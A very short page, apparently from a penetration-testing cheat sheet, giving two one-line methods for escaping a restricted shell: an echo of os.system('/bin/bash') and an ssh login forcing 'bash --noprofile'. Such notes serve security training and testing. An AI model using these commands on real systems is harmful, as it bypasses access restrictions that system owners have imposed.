Resources:
Escape a restricted shell with echo command:
echo os.system('/bin/bash')
ssh <username>@<ip> -t "bash --noprofile"
Last updated 3 years ago